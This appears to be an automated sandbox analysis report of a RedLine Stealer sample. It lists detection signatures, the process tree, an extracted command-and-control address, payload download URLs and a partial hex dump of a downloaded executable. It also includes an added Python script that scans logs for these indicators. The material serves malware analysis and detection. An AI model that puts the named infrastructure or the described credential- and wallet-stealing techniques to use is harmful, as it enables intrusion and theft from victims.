
Windows Analysis Report VYeSXonMT1.exe

Overview

General Information

Sample Name: VYeSXonMT1.exe
Analysis ID: 528743
MD5: 0e852a9d4e42120623c0112e53f70992
SHA1: 980fed1b88c494360a3eaad95fd3da046bb85f6e
SHA256: 6c00faff9e01fa7fe3a9a681658c61b4802817a91b74351f7a3e6ad19540f9f1
Tags: exe, RedLineStealer

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected Evader
Detected unpacking (overwrites its own PE header)
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
May check the online IP address of the machine
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Creates HTML files with .exe extension (expired dropper behavior)
Contains functionality to register a low level keyboard hook
Sample or dropped binary is a compiled AutoHotkey binary
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Yara detected Autohotkey Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to communicate with device drivers
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to simulate mouse events
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Process Tree

  • System is w10x64
  • VYeSXonMT1.exe (PID: 6972 cmdline: "C:\Users\user\Desktop\VYeSXonMT1.exe" MD5: 0E852A9D4E42120623C0112E53F70992)
    • mopnns.exe (PID: 6312 cmdline: mopnns.exe MD5: 3F91E0102D6832F36DA2D908672B2266)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.215.113.15:21508"], "Bot Id": "mix25.11"}
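The extracted configuration above, together with the download URLs and the IP-check DNS name that appear later in this report, can be turned directly into detection content. The following Python script is an added example and is not part of the Joe Sandbox report: it parses the RedLine config JSON as the extractor prints it, joins it with the other network indicators from this page, and scans a handful of log lines for matches. The log lines (DNS, web proxy, firewall) and their formats are constructed for the example; the helper names are assumptions, not tooling from the report.

```python
"""Turn the indicators from this report into a log scanner.

Added example, not part of the sandbox report. The log line formats below are
constructed for illustration; adapt the regexes to your own log sources.
"""
import json
import re
from urllib.parse import urlparse

# Indicators copied from the report: the extracted RedLine config (Malware
# Configuration section), the two download URLs and the IP-check DNS name.
REDLINE_CONFIG = '{"C2 url": ["185.215.113.15:21508"], "Bot Id": "mix25.11"}'
DOWNLOAD_URLS = [
    "http://blairwitch.top/work/mix.exe",
    "http://blairwitch.top/jollion/apines.exe",
]
IP_CHECK_DOMAINS = ["iplogger.org"]

DOMAIN_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b")
HOSTPORT_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\b")


def build_iocs(config_json=REDLINE_CONFIG, urls=DOWNLOAD_URLS, domains=IP_CHECK_DOMAINS):
    """Normalise the report's indicators into sets the scanner can match on."""
    cfg = json.loads(config_json)
    c2 = set()
    for entry in cfg.get("C2 url", []):
        host, _, port = entry.rpartition(":")  # RedLine stores the C2 as "ip:port"
        c2.add((host, int(port)))
    hosts = {urlparse(u).hostname for u in urls} | set(domains)
    return {
        "c2": c2,
        "c2_ips": {ip for ip, _ in c2},
        "domains": hosts,
        "bot_id": cfg.get("Bot Id"),
    }


def scan_log_lines(lines, iocs):
    """Return (line_number, reason) for every line that touches an indicator."""
    hits = []
    for n, line in enumerate(lines, 1):
        low = line.lower()
        for host in DOMAIN_RE.findall(low):
            if any(host == d or host.endswith("." + d) for d in iocs["domains"]):
                hits.append((n, f"domain {host}"))
        for ip, port in HOSTPORT_RE.findall(low):
            if (ip, int(port)) in iocs["c2"]:
                hits.append((n, f"c2 {ip}:{port}"))
            elif ip in iocs["c2_ips"]:
                # The report shows the bot touching ports 0,1,2,5,8 on the C2 host
                # as well, so any other port on that IP is flagged at lower confidence.
                hits.append((n, f"c2-ip {ip} on unexpected port {port}"))
    return hits


# Constructed sample log lines (not taken from the report): DNS, proxy, firewall.
SAMPLE_LOG = [
    "2021-11-25T17:23:40Z dns client=192.168.2.6 query=blairwitch.top type=A",
    "2021-11-25T17:23:43Z proxy src=192.168.2.6 GET http://blairwitch.top/work/mix.exe status=200 bytes=292352",
    "2021-11-25T17:23:45Z dns client=192.168.2.6 query=iplogger.org type=A",
    "2021-11-25T17:23:50Z fw src=192.168.2.6:49772 dst=185.215.113.15:21508 proto=tcp action=allow",
    "2021-11-25T17:23:51Z fw src=192.168.2.6:49773 dst=185.215.113.15:2 proto=tcp action=deny",
    "2021-11-25T17:24:00Z dns client=192.168.2.7 query=www.microsoft.com type=A",
]

if __name__ == "__main__":
    for n, reason in scan_log_lines(SAMPLE_LOG, build_iocs()):
        print(f"line {n}: {reason}")
```

The domain match is suffix-based so subdomains of blairwitch.top are caught, while a connection to the C2 IP on a port other than 21508 is reported separately: the report's "Connects to many ports of the same IP" signature shows that traffic to that host is not limited to the configured port.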

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp | JoeSecurity_AutohotkeyDownloaderGeneric | Yara detected Autohotkey Downloader Generic | Joe Security
00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp | JoeSecurity_Evader | Yara detected Evader | Joe Security
00000004.00000002.468644721.0000000002185000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000004.00000002.476408687.0000000004F40000.00000004.00020000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000004.00000002.469335503.0000000002648000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(5 of 11 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.mopnns.exe.49d0ee8.4.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
4.3.mopnns.exe.74ac80.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
4.2.mopnns.exe.21c54fe.2.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
4.2.mopnns.exe.4f40000.6.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
4.3.mopnns.exe.74ac80.1.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
(5 of 9 entries shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 4.2.mopnns.exe.49d0000.5.raw.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["185.215.113.15:21508"], "Bot Id": "mix25.11"}
Multi AV Scanner detection for submitted file
Source: VYeSXonMT1.exe | Virustotal: Detection: 50%
Multi AV Scanner detection for domain / URL
Source: http://blairwitch.top/work/mix.exe | Virustotal: Detection: 12%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe | ReversingLabs: Detection: 82%
Machine Learning detection for sample
Source: VYeSXonMT1.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe | Joe Sandbox ML: detected
Source: 0.2.VYeSXonMT1.exe.3990e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.VYeSXonMT1.exe.3a60000.0.unpack | Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Unpacked PE file: 0.2.VYeSXonMT1.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\blair\mopnns.exe | Unpacked PE file: 4.2.mopnns.exe.400000.0.unpack
Source: VYeSXonMT1.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\VYeSXonMT1.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 5.9.162.45:443 -> 192.168.2.6:49766 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.9.162.45:443 -> 192.168.2.6:49769 version: TLS 1.2
Source: Binary string: _.pdb | source: mopnns.exe, 00000004.00000002.468644721.0000000002185000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.475297379.00000000049D0000.00000004.00020000.sdmp, mopnns.exe, 00000004.00000003.402292014.000000000074A000.00000004.00000001.sdmp
Source: Binary string: C:\xohare dolihupabimig\kaluyix\73.pdb | source: VYeSXonMT1.exe
Source: Binary string: C:\bol\voge hixolub\yebu\losevoduzih-fayipa\weginitowa\gevopit.pdb | source: mopnns.exe, 00000004.00000000.396223546.0000000000438000.00000002.00020000.sdmp, mopnns.exe.0.dr
Source: Binary string: C:\xohare dolihupabimig\kaluyix\73.pdbP | source: VYeSXonMT1.exe
Source: Binary string: 5C:\bol\voge hixolub\yebu\losevoduzih-fayipa\weginitowa\gevopit.pdb0= | source: mopnns.exe, 00000004.00000000.396223546.0000000000438000.00000002.00020000.sdmp, mopnns.exe.0.dr

Spreading:

Yara detected Autohotkey Downloader Generic
Source: Yara match | File source: 0.2.VYeSXonMT1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: VYeSXonMT1.exe PID: 6972, type: MEMORYSTR
Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_004770E0 FindFirstFileW,FindClose,GetFileAttributesW | 0_2_004770E0
Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_00477170 _wcschr,_wcschr,_wcschr,FindFirstFileW,FindClose,_wcschr,FindFirstFileW,FindClose | 0_2_00477170
Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_00444070 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime | 0_2_00444070
Source: C:\Users\user\Desktop\VYeSXonMT1.exe | Code function: 0_2_004443B0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z | 0_2_004443B0

Networking:

Connects to many ports of the same IP (likely port scanning)
Source: global traffic | TCP traffic: 185.215.113.15 ports 21508,0,1,2,5,8
May check the online IP address of the machine
Source: C:\Users\user\Desktop\VYeSXonMT1.exe | DNS query: name: iplogger.org
Source: C:\Users\user\Desktop\VYeSXonMT1.exe | DNS query: name: iplogger.org
Creates HTML files with .exe extension (expired dropper behavior)
Source: C:\Users\user\Desktop\VYeSXonMT1.exe | File created: arinesp.exe.0.dr
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 17:23:43 GMTServer: Apache/2.4.38 (Debian)Last-Modified: Wed, 24 Nov 2021 20:15:01 GMTETag: "47600-5d18e834737b3"Accept-Ranges: bytesContent-Length: 292352Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 03 34 fe 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 6a 03 00 00 66 01 00 00 00 00 00 9b 2c 00 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 04 00 00 04 00 00 a3 a7 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 ef 03 00 78 00 00 00 00 70 04 00 78 75 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 81 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 9c 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 69 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 26 78 00 00 00 80 03 00 00 7a 00 00 00 6e 03 00 00 00 00 00 
00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 62 00 00 00 00 04 00 00 18 00 00 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 75 00 00 00 70 04 00 00 76 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View | IP Address: 185.215.113.15 185.215.113.15
Source: Joe Sandbox View | IP Address: 185.215.113.15 185.215.113.15
Source: global traffic | TCP traffic: 192.168.2.6:49772 -> 185.215.113.15:21508
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: VYeSXonMT1.exe, 00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp, VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp | String found in binary or memory: http://blairwitch.top/jollion/apines.exe
Source: VYeSXonMT1.exe, 00000000.00000002.406204176.0000000003A60000.00000004.00000001.sdmp | Strings found in binary or memory:
  http://blairwitch.top/jollion/apines.exearinesp.exe?
  http://blairwitch.top/work/mix.exemopnns.exe?
Source: VYeSXonMT1.exe, 00000000.00000002.406356818.0000000003F70000.00000004.00000001.sdmp | Strings found in binary or memory:
  http://blairwitch.top/jollion/apines.exet
  http://crl.globalsign.net/root-r2.crl0
Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000002.405540255.00000000004CE000.00000040.00020000.sdmp, VYeSXonMT1.exe, 00000000.00000002.406187807.0000000003A41000.00000040.00000001.sdmp, VYeSXonMT1.exe, 00000000.00000003.374963665.0000000003B10000.00000004.00000001.sdmp | String found in binary or memory: http://blairwitch.top/work/mix.exe
Source: VYeSXonMT1.exe, 00000000.00000002.406411252.0000000003FD0000.00000004.00000001.sdmp | Strings found in binary or memory:
  http://blairwitch.top/work/mix.exe5
  http://blairwitch.top/work/mix.exep
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469502424.0000000002711000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp | Strings found in binary or memory:
  http://forms.rea
  http://forms.real.com/real/realone/download.html?type=rpsp_us
  http://go.micros
Source: mopnns.exe, 00000004.00000002.470687600.0000000002ACA000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470406692.0000000002A0C000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.469912099.0000000002838000.00000004.00000001.sdmp, mopnns.exe, 00000004.00000002.470098742.00000000028F7000.00000004.00000001.sdmp | String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmp | Strings found in binary or memory:
  http://schemas.xmlsoap.org/soap/actor/next
  http://schemas.xmlsoap.org/soap/envelope/
  http://schemas.xmlsoap.org/ws/2004/08/addressing
  http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
  http://schemas.xmlsoap.org/ws/2005/02/rm
  http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
  http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
  http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
  http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
  http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmp | Strings found in binary or memory:
  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
  http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
  http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
  http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
  http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
  http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
  http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
  http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
  http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
  http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
  http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
  http://schemas.xmlsoap.org/ws/2002/12/policy
  http://schemas.xmlsoap.org/ws/2004/04/sc
  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
  http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
  http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
  http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
  http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
  http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
  http://schemas.xmlsoap.org/ws/2004/04/trust
  http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
  http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
  http://schemas.xmlsoap.org/ws/2004/06/addressingex
  http://schemas.xmlsoap.org/ws/2004/10/wsat
  http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
  http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
  http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
  http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
  http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
  http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
  http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
  http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
  http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
  http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
  http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
  http://schemas.xmlsoap.org/ws/2004/10/wscoor
  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
  http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
  http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
  http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
  http://schemas.xmlsoap.org/ws/2005/02/sc
  http://schemas.xmlsoap.org/ws/2005/02/sc/dk
  http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: mopnns.exe, 00000004.00000002.468922546.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                        Source: mopnns.exe, 00000004.00000002.468998375.0000000002517000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
